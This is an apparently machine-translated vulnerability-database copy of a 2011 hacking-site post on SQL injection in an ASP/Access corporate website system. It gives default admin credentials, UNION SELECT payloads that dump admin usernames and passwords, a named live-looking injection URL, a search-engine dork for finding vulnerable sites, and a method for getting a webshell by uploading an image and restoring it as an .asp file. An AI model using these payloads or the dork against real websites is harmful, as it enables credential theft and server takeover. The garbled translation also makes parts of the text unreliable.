Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62201131380
HistoryJul 29, 2011 - 12:00 a.m.

Houben figure enterprise website system cookies injection-vulnerability warning-the black bar safety net

2011-07-2900:00:00
佚名
www.myhack58.com
183
JSON

Based on asp+access corporate website source code, database has been provided with an anti-download the site more secure. To modify a site, custom your own to the page, and landscaping page is your own complete, website source code program is complete, the background powerful.

Source code download: http://www.aspjzy.com/12746.html

Program complete log back:/admin/login. asp

The default landing account:admin password:admin888

Statement: (preceded by a space)

and 1=2 union select 1,username,password,4,5,6,7,8,9,1 0 from admin

Or is 1 6 fields:

and 1=2 union select 1,username,password,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6 from admin

Burst out yourself to guess the field.

Injection point: http://www.xueyu.org/shownews.asp?=88

getshell:background there is a backup, upload pictures of ponies. Backup name:. asp access xxx.com/databakup/a.asp

Keywords:

inurl:shownews? asp. id=

JSON